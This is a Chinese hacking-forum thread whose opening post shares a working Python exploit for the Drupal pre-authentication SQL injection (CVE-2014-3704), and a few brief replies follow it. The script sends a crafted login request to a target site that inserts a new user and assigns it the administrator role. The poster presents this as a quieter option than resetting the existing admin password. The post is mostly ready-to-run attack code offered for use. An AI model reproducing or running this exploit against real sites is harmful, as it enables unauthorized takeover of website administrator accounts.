查看: 13093|回复: 3

Drupal - pre Auth SQL Injection Vulnerability(CVE-2014-3704)

[复制链接]
发表于 2014-10-16 19:15:24 | 显示全部楼层 |阅读模式
[AppleScript] 纯文本查看 复制代码
import urllib2,sys
from drupalpass import DrupalHash # [url]http://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py[/url]
if len(sys.argv) != 4:
    print ""
    print "python 7.xSQL.py  [url]http://xxoo.com/drupal[/url] admin 123456"
    print ""
    sys.exit(1)
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
insert_user = "name[0%20;set+@a%3d%28SELECT+MAX%28uid%29+FROM+users%29%2b1;INSERT+INTO+users+set+uid%3d@a,status%3d1,name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
            +hash[:55] \
            +"';INSERT+INTO+users_roles+set+uid%3d@a,rid%3d3;;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
#print insert_user
content = urllib2.urlopen(url=target, data=insert_user).read()
if "mb_strlen() expects parameter 1" in content:
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

网上的POC直接修改管理员的密码太暴力了,此EXP是添加一个自定义账号密码的管理员权限用户

下载 http://github.com/cvangysel/gite ... alorg/drupalpass.py 放到同目录即可。
回复

使用道具 举报

发表于 2014-10-17 16:49:01 | 显示全部楼层
{:soso_e103:}看不懂,这个事什么CMS的
回复 支持 反对

使用道具 举报

发表于 2014-10-17 21:59:29 | 显示全部楼层
表示看不懂,不明觉厉
回复 支持 反对

使用道具 举报

发表于 2014-10-18 21:44:36 | 显示全部楼层
靠谱么 怎么测试报错啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 07:56 , Processed in 0.019175 second(s), 9 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部